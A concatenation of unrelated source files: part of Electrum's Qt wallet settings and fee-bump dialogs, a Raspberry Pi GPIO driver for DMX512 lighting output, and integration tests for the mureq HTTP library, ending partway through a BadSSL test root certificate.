msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transaction fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_list.refresh_headers()
if self.fx.is_enabled() and checked:
# reset timeout to get historical rates
self.fx.timeout = 0
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('Appearance')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.timeout = 0
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
name = descr['__name__']
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stdout)
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes' % total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
def f(x):
a = max_fee - fee_e.get_amount()
output_amount.setText((self.format_amount(a) + ' ' + self.base_unit()) if a else '')
fee_e.textChanged.connect(f)
fee = self.config.fee_per_kb() * total_size / 1000
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * total_size / 1000
fee = min(max_fee, fee)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('Current fee') + ': %s' % self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('New fee') + ':'))
fee_e = BTCAmountEdit(self.get_decimal_point)
fee_e.setAmount(fee * 1.5)
vbox.addWidget(fee_e)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * tx_size / 1000
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee = fee_e.get_amount()
delta = new_fee - fee
if delta < 0:
self.show_error("fee too low")
return
try:
new_tx = self.wallet.bump_fee(tx, delta)
except BaseException as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
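# --- Illustrative sketch (not part of Electrum) ----------------------------
# Both dialogs above turn a fee rate in satoshis per kilobyte and a
# transaction size in bytes into an absolute fee, clamped to the amount that
# is actually spendable. A minimal standalone version of that arithmetic,
# assuming those units, could look like this:
def _sketch_fee_from_rate(fee_rate_per_kb, tx_size_bytes, max_fee=None):
    """Return an absolute fee (in satoshis) for a transaction of the given size."""
    fee = fee_rate_per_kb * tx_size_bytes / 1000
    if max_fee is not None:
        fee = min(max_fee, fee)
    return int(fee)
# Example: 5000 sat/kB over a 300-byte parent+child pair, capped by a
# 1200-sat output value, gives min(1500, 1200) == 1200 satoshis.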
|
dmx512.py
|
#!/usr/bin/python3
# Author: Kenta Ishii
# SPDX short identifier: BSD-3-Clause
# ./dmx512.py
import RPi.GPIO as gpio
import threading
class DMX512:
"""Dependency:RPi.GPIO, threading"""
def __init__(self, list_gpio_output, num_gpio_busy_toggle, num_gpio_eop_toggle):
self.list_gpio_output = list_gpio_output
self.num_gpio_busy_toggle = num_gpio_busy_toggle
self.num_gpio_eop_toggle = num_gpio_eop_toggle
gpio.setmode(gpio.BCM)
gpio.setup(self.list_gpio_output, gpio.OUT)
gpio.output(self.list_gpio_output, 0)
gpio.setup(self.num_gpio_busy_toggle, gpio.IN, pull_up_down=gpio.PUD_DOWN)
#gpio.add_event_detect(num_gpio_busy_toggle, gpio.BOTH)
gpio.setup(self.num_gpio_eop_toggle, gpio.IN, pull_up_down=gpio.PUD_DOWN)
#gpio.add_event_detect(num_gpio_eop_toggle, gpio.BOTH)
def transmitter(self, list_data, index, length, time_delay):
status_gpio_busy_toggle = gpio.input(self.num_gpio_busy_toggle)
length += index
while index < length:
data = list_data[index]
list_bit = []
if data & 0b00001:
list_bit.append(self.list_gpio_output[1])
if data & 0b00010:
list_bit.append(self.list_gpio_output[2])
if data & 0b00100:
list_bit.append(self.list_gpio_output[3])
if data & 0b01000:
list_bit.append(self.list_gpio_output[4])
if data & 0b10000:
list_bit.append(self.list_gpio_output[5])
#print(list_bit)
gpio.output(self.list_gpio_output, 0)
gpio.output(self.list_gpio_output[0], 1) # High State of Clock
gpio.output(list_bit, 1)
dup_time_delay = time_delay
while dup_time_delay > 0:
dup_time_delay -= 1
gpio.output(self.list_gpio_output[0], 0) # Falling Edge of Clock
while True:
if status_gpio_busy_toggle != gpio.input(self.num_gpio_busy_toggle):
status_gpio_busy_toggle = gpio.input(self.num_gpio_busy_toggle)
index += 1
break
def start_tx(self, list_data, index, length, time_delay):
thread = threading.Thread(name='dmx512_start_tx', target=self.transmitter, args=(list_data, index, length, time_delay, ))
thread.daemon = True
thread.start()
return thread
def eop_toggle(self):
return gpio.input(self.num_gpio_eop_toggle)
def __del__(self):
gpio.cleanup()
if __name__ == '__main__':
import sys
import time
import signal
version_info = "DMX512 Alpha"
def handle_sigint(signum, frame):
print(version_info + ": Force Stop")
sys.exit(0)
signal.signal(signal.SIGINT, handle_sigint)
argv = sys.argv
if len(argv) == 1:
time_delay = 4
else:
time_delay = float(argv[1])
print(sys.version)
# Call Class
dmx512 = DMX512([12,16,19,20,21,26], 6, 13)
# Initialization of Flushing Method
list_data = [0x1F, 0x14, 0x1B, 0x11, 0x00, 0x13]
thread1 = dmx512.start_tx(list_data, 0, 6, time_delay)
thread1.join()
# Set Initial Values and Start
list_data = [1] * 1026
thread1 = dmx512.start_tx(list_data, 0, 1026, time_delay)
thread1.join()
# Start DMX512 Transmission
list_data = [0x1D, 0x1A]
thread1 = dmx512.start_tx(list_data, 0, 2, time_delay)
thread1.join()
status_gpio_eop_toggle = dmx512.eop_toggle()
count = 2
while True:
list_data = [count] * 1026
thread1 = dmx512.start_tx(list_data, 0, 1026, time_delay)
thread1.join()
count += 1
if count > 0xF:
count = 0
break
while True:
if status_gpio_eop_toggle != dmx512.eop_toggle():
status_gpio_eop_toggle = dmx512.eop_toggle()
break
#if gpio.event_detected(num_gpio_eop_toggle) == 1:
# break
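# --- Illustrative sketch (not part of the DMX512 module) -------------------
# In DMX512.transmitter above, list_gpio_output[0] acts as the clock and
# bits 0-4 of each data word choose which of list_gpio_output[1..5] go high.
# The same mapping as a pure-Python helper; the default pin numbers are
# simply the ones used in the __main__ example above, not a requirement.
def _sketch_pins_for_word(data, list_gpio_output=(12, 16, 19, 20, 21, 26)):
    """Return the data pins (excluding the clock pin) to drive high for `data`."""
    return [list_gpio_output[bit + 1] for bit in range(5) if data & (1 << bit)]
# Example: 0b10011 selects pins 16, 19 and 26 while pin 12 toggles as the clock.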
|
test_integration.py
|
"""
Integration tests for mureq.
These tests depend on third-party infrastructure and MUST NOT be run in an
automated CI setting.
"""
import contextlib
import json
import unittest
import socket
import threading
import tempfile
import os.path
import urllib.parse
import ssl
import http.client
import http.server
import mureq
class MureqIntegrationTestCase(unittest.TestCase):
def _get_json(self, response):
# helper for httpbin endpoints
self.assertEqual(response.status_code, 200)
self.assertEqual(response.ok, True)
self.assertTrue(response.body is response.content)
result = json.loads(response.body)
self.assertEqual(result['headers']['Host'], ['httpbingo.org'])
return result
def test_get(self):
result = self._get_json(mureq.get('https://httpbingo.org/get'))
self.assertEqual(result['headers']['User-Agent'], [mureq.DEFAULT_UA])
self.assertEqual(result['url'], 'https://httpbingo.org/get')
def test_get_http(self):
result = self._get_json(mureq.get('http://httpbingo.org/get'))
self.assertEqual(result['headers']['User-Agent'], [mureq.DEFAULT_UA])
self.assertEqual(result['url'], 'http://httpbingo.org/get')
def test_headers(self):
result = self._get_json(mureq.get('https://httpbingo.org/get',
headers={'User-Agent': 'xyzzy', 'X-Test-Header': 'plugh'}))
self.assertEqual(result['url'], 'https://httpbingo.org/get')
self.assertEqual(result['headers']['User-Agent'], ['xyzzy'])
self.assertEqual(result['headers']['X-Test-Header'], ['plugh'])
def test_headers_list(self):
headers = [
('X-Test-Header-1', '1'),
('X-Test-Header-2', '2'),
('X-Test-Header-3', '3'),
('X-Test-Header-4', '4'),
]
result = self._get_json(mureq.get('https://httpbingo.org/get', headers=headers))
for k, v in headers:
self.assertEqual(result['headers'][k], [v])
def test_request(self):
result = self._get_json(mureq.request('GET', 'https://httpbingo.org/get', timeout=10.0))
self.assertEqual(result['headers']['User-Agent'], [mureq.DEFAULT_UA])
self.assertEqual(result['url'], 'https://httpbingo.org/get')
def test_yield_response(self):
with mureq.yield_response('GET', 'https://httpbingo.org/get') as response:
# should yield the stdlib type
self.assertEqual(type(response), http.client.HTTPResponse)
self.assertEqual(response.status, 200)
self.assertEqual(response.url, 'https://httpbingo.org/get')
self.assertEqual(json.loads(response.read())['url'], 'https://httpbingo.org/get')
def test_bad_method(self):
response = mureq.post('https://httpbingo.org/get')
self.assertEqual(response.status_code, 405)
self.assertEqual(response.ok, False)
response = mureq.request('PATCH', 'https://httpbingo.org/post', body=b'1')
self.assertEqual(response.status_code, 405)
self.assertEqual(response.ok, False)
def test_query_params(self):
result = self._get_json(mureq.get('https://httpbingo.org/get'))
self.assertEqual(result['url'], 'https://httpbingo.org/get')
self.assertEqual(result['args'], {})
result = self._get_json(mureq.get('https://httpbingo.org/get?a=b'))
self.assertEqual(result['url'], 'https://httpbingo.org/get?a=b')
self.assertEqual(result['args'], {'a': ['b']})
result = self._get_json(mureq.get('https://httpbingo.org/get', params={'a': 'b'}))
self.assertEqual(result['url'], 'https://httpbingo.org/get?a=b')
self.assertEqual(result['args'], {'a': ['b']})
result = self._get_json(mureq.get('https://httpbingo.org/get?', params={'a': 'b'}))
self.assertEqual(result['url'], 'https://httpbingo.org/get?a=b')
self.assertEqual(result['args'], {'a': ['b']})
result = self._get_json(mureq.get('https://httpbingo.org/get?a=b', params={'c': 'd'}))
self.assertEqual(result['url'], 'https://httpbingo.org/get?a=b&c=d')
self.assertEqual(result['args'], {'a': ['b'], 'c': ['d']})
def test_url_populated(self):
result = mureq.get('https://httpbingo.org/get?a=b')
self.assertEqual(result.url, 'https://httpbingo.org/get?a=b')
result = mureq.get('https://httpbingo.org/get', params={'a': 'b'})
self.assertEqual(result.url, 'https://httpbingo.org/get?a=b')
result = mureq.get('https://httpbingo.org/get?c=d', params={'a': 'b'})
self.assertEqual(result.url, 'https://httpbingo.org/get?c=d&a=b')
def test_head(self):
response = mureq.head('https://httpbingo.org/head')
self.assertIn('Content-Length', response.headers)
def test_post(self):
result = self._get_json(mureq.post('https://httpbingo.org/post', body=b'xyz'))
self.assertEqual(result['headers']['User-Agent'], [mureq.DEFAULT_UA])
self.assertEqual(result['url'], 'https://httpbingo.org/post')
self.assertEqual(result['data'], 'xyz')
def test_put(self):
result = self._get_json(mureq.put('https://httpbingo.org/put', body=b'strawberry'))
self.assertEqual(result['headers']['User-Agent'], [mureq.DEFAULT_UA])
self.assertEqual(result['url'], 'https://httpbingo.org/put')
self.assertEqual(result['data'], 'strawberry')
def test_patch(self):
result = self._get_json(mureq.patch('https://httpbingo.org/patch', body=b'burrito'))
self.assertEqual(result['headers']['User-Agent'], [mureq.DEFAULT_UA])
self.assertEqual(result['url'], 'https://httpbingo.org/patch')
self.assertEqual(result['data'], 'burrito')
def test_json(self):
result = self._get_json(mureq.post('https://httpbingo.org/post', json=json.dumps({'a': 1})))
# we must add the application/json header here
self.assertEqual(result['headers']['Content-Type'], ['application/json'])
self.assertEqual(result['json'], {'a': 1})
data = json.dumps({'b': 2})
result = self._get_json(mureq.post('https://httpbingo.org/post', json=data,
headers={'Content-Type': 'application/jose+json'}))
# we must not override the user-supplied content-type header
self.assertEqual(result['headers']['Content-Type'], ['application/jose+json'])
self.assertEqual(result['data'], data)
def test_form(self):
result = self._get_json(mureq.post('https://httpbingo.org/post', form={'a': '1'}))
self.assertEqual(result['headers']['Content-Type'], ['application/x-www-form-urlencoded'])
self.assertEqual(result['data'], 'a=1')
# with the correct Content-Type header, test that the body was interpreted as expected:
self.assertEqual(result['form']['a'], ['1'])
# we must not override the user-supplied content-type header if it is present:
result = self._get_json(mureq.post('https://httpbingo.org/post', form={'a': '1'},
headers={'Content-Type': 'application/jose+json'}))
self.assertEqual(result['headers']['Content-Type'], ['application/jose+json'])
self.assertEqual(result['data'], 'a=1')
def test_redirects(self):
# redirects us to /get
response = mureq.get('https://httpbingo.org/redirect/1')
# by default redirect is not followed
self.assertEqual(response.status_code, 302)
self.assertEqual(response.headers['Location'], '/get')
self.assertEqual(response.url, 'https://httpbingo.org/redirect/1')
# allow 1 redirect, we should actually retrieve /get
response = mureq.get('https://httpbingo.org/redirect/1', max_redirects=1)
# url field should be populated with the retrieved URL
self.assertEqual(response.url, 'https://httpbingo.org/get')
self.assertEqual(response.status_code, 200)
self.assertEqual(json.loads(response.body)['url'], 'https://httpbingo.org/get')
self.assertEqual(response.url, 'https://httpbingo.org/get')
# redirect twice, should be disallowed:
with self.assertRaises(mureq.TooManyRedirects):
mureq.get('https://httpbingo.org/redirect/2', max_redirects=1)
response = mureq.get('https://httpbingo.org/redirect/2', max_redirects=2)
self.assertEqual(response.status_code, 200)
self.assertEqual(json.loads(response.body)['url'], 'https://httpbingo.org/get')
self.assertEqual(response.url, 'https://httpbingo.org/get')
with self.assertRaises(mureq.TooManyRedirects):
mureq.get('https://httpbingo.org/redirect/3', max_redirects=2)
def test_307(self):
response = mureq.get('https://httpbingo.org/redirect-to?url=/get&status_code=307')
self.assertEqual(response.status_code, 307)
self.assertEqual(response.headers['Location'], '/get')
self.assertEqual(response.url, 'https://httpbingo.org/redirect-to?url=/get&status_code=307')
# 307 should be followed
response = mureq.get('https://httpbingo.org/redirect-to?url=/get&status_code=307', max_redirects=1)
self.assertEqual(response.status_code, 200)
self.assertEqual(json.loads(response.body)['url'], 'https://httpbingo.org/get')
self.assertEqual(response.url, 'https://httpbingo.org/get')
# 307 doesn't change the method:
response = mureq.get('https://httpbingo.org/redirect-to?url=/post&status_code=307', max_redirects=1)
self.assertEqual(response.status_code, 405)
self.assertEqual(response.url, 'https://httpbingo.org/post')
response = mureq.post('https://httpbingo.org/redirect-to?url=/post&status_code=307', body=b'xyz', max_redirects=1)
self.assertEqual(response.url, 'https://httpbingo.org/post')
self.assertEqual(response.status_code, 200)
self.assertEqual(json.loads(response.body)['data'], 'xyz')
def test_303(self):
# 303 turns POST into GET
response = mureq.post('https://httpbingo.org/redirect-to?url=/post&status_code=303', body=b'xyz')
self.assertEqual(response.status_code, 303)
self.assertEqual(response.url, 'https://httpbingo.org/redirect-to?url=/post&status_code=303')
response = mureq.post('https://httpbingo.org/redirect-to?url=/post&status_code=303', body=b'xyz', max_redirects=1)
# now we're trying to GET to /post, which should fail:
self.assertEqual(response.status_code, 405)
self.assertEqual(response.url, 'https://httpbingo.org/post')
response = mureq.post('https://httpbingo.org/redirect-to?url=/get&status_code=303', body=b'xyz', max_redirects=1)
self.assertEqual(response.status_code, 200)
self.assertEqual(json.loads(response.body)['url'], 'https://httpbingo.org/get')
self.assertEqual(response.url, 'https://httpbingo.org/get')
def test_read_limit(self):
response = mureq.get('https://httpbingo.org/get', headers={'X-Test-1': 'porcupine'})
self._get_json(response)
length = int(response.headers.get('content-length'))
self.assertEqual(length, len(response.body))
limit = length//2
response = mureq.get('https://httpbingo.org/get', headers={'X-Test-1': 'porcupine'}, read_limit=limit)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.body), limit)
with self.assertRaises(json.JSONDecodeError):
json.loads(response.body)
def _run_unix_server(sock):
"""Accept loop for a toy http+unix server, to be run in a thread."""
while True:
try:
connection, _ = sock.accept()
except OSError:
# the listening socket was closed; stop the accept loop
return
fileobj = connection.makefile('rb')
# read all headers
while fileobj.readline().strip():
pass
connection.send(b'HTTP/1.0 204 No Content\r\nDate: Sun, 12 Dec 2021 08:17:16 GMT\r\n\r\n')
connection.close()
@contextlib.contextmanager
def unix_http_server():
"""Contextmanager providing a http+unix server with its socket in a tmpdir."""
with tempfile.TemporaryDirectory() as dirpath:
path = os.path.join(dirpath, 'sock')
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.bind(path)
sock.listen(1)
threading.Thread(target=_run_unix_server, args=(sock,)).start()
try:
yield path
finally:
sock.shutdown(socket.SHUT_RDWR)
sock.close()
class MureqIntegrationUnixSocketTestCase(unittest.TestCase):
def test_unix_socket(self):
with unix_http_server() as unix_socket:
response = mureq.get('http://localhost', unix_socket=unix_socket)
self.assertEqual(response.status_code, 204)
self.assertEqual(response.headers['Date'], 'Sun, 12 Dec 2021 08:17:16 GMT')
# test unix socket URL convention:
# quote() has default safe='/', we must explicitly disable that so / is quoted as %2F
response = mureq.get('http+unix://%s/bar/baz' % (urllib.parse.quote(unix_socket, safe=''),))
self.assertEqual(response.status_code, 204)
self.assertEqual(response.headers['Date'], 'Sun, 12 Dec 2021 08:17:16 GMT')
@contextlib.contextmanager
def local_http_server():
with http.server.ThreadingHTTPServer(('127.0.0.1', 0), http.server.SimpleHTTPRequestHandler) as httpd:
host, port = httpd.socket.getsockname()[:2]
try:
threading.Thread(target=httpd.serve_forever).start()
yield port
finally:
httpd.shutdown()
class MureqIntegrationPortTestCase(unittest.TestCase):
def test_nonstandard_port(self):
with local_http_server() as port:
# test reading the port out of the URL:
url = 'http://127.0.0.1:%d/' % (port,)
response = mureq.get(url)
self.assertEqual(response.status_code, 200)
def test_source_address(self):
# TODO implement a local HTTP server that can actually validate
# the source address; right now this is just a coverage test
with local_http_server() as port:
# test reading the port out of the URL:
url = 'http://127.0.0.1:%d/' % (port,)
response = mureq.get(url, source_address='127.18.18.18')
self.assertEqual(response.status_code, 200)
BADSSL_ROOT="""
-----BEGIN CERTIFICATE-----
MIIGfjCCBGagAwIBAgIJAJeg/PrX5Sj9MA0GCSqGSIb3DQEBCwUAMIGBMQswCQYD
VQQGEwJVUzETMBEGA1UECAwKQ2FsaWZvcm5pYTEWMBQGA1UEBwwNU2FuIEZyYW5j
aXNjbzEPMA0GA1UECgwGQmFkU1NMMTQwMgYDVQQDDCtCYWRTU0wgVW50cnVzdGVk
IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5MB4XDTE2MDcwNzA2MzEzNVoXDTM2
MDcwMjA2MzEzNVowgYExCzAJBgNVBAYTAlVTMRMwEQYDVQQIDApDYWxpZm9ybmlh
MRYwFAYDVQQHDA1TYW4gRnJhbmNpc2NvMQ8wDQYDVQQKDAZCYWRTU0wxNDAyBgNV
BAMMK0JhZFNTTCBVbnRydXN0ZWQgUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkw
ggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDKQtPMhEH073gis/HISWAi
bOEpCtOsatA3JmeVbaWal8O/5ZO5GAn9dFVsGn0CXAHR6eUKYDAFJLa/3AhjBvWa
tnQLoXaYlCvBjodjLEaFi8ckcJHrAYG9qZqioRQ16Yr8wUTkbgZf+er/Z55zi1yn
CnhWth7kekvrwVDGP1rApeLqbhYCSLeZf5W/zsjLlvJni9OrU7U3a9msvz8mcCOX
fJX9e3VbkD/uonIbK2SvmAGMaOj/1k0dASkZtMws0Bk7m1pTQL+qXDM/h3BQZJa5
DwTcATaa/Qnk6YHbj/MaS5nzCSmR0Xmvs/3CulQYiZJ3kypns1KdqlGuwkfiCCgD
yWJy7NE9qdj6xxLdqzne2DCyuPrjFPS0mmYimpykgbPnirEPBF1LW3GJc9yfhVXE
Cc8OY8lWzxazDNNbeSRDpAGbBeGSQXGjAbliFJxwLyGzZ+cG+G8lc+zSvWjQu4Xp
GJ+dOREhQhl+9U8oyPX34gfKo63muSgo539hGylqgQyzj+SX8OgK1FXXb2LS1gxt
VIR5Qc4MmiEG2LKwPwfU8Yi+t5TYjGh8gaFv6NnksoX4hU42gP5KvjYggDpR+NSN
CGQSWHfZASAYDpxjrOo+rk4xnO+sbuuMk7gORsrl+jgRT8F2VqoR9Z3CEdQxcCjR
5FsfTymZCk3GfIbWKkaeLQIDAQABo4H2MIHzMB0GA1UdDgQWBBRvx4NzSbWnY/91
3m1u/u37l6MsADCBtgYDVR0jBIGuMIGrgBRvx4NzSbWnY/913m1u/u37l6MsAKGB
h6SBhDCBgTELMAkGA1UEBhMCVVMxEzARBgNVBAgMCkNhbGlmb3JuaWExFjAUBgNV
BAcMDVNhbiBGcmFuY2lzY28xDzANBgNVBAoMBkJhZFNTTDE0MDIGA1UEAwwrQmFk
U1NMIFVudHJ1c3RlZCBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eYIJAJeg/PrX
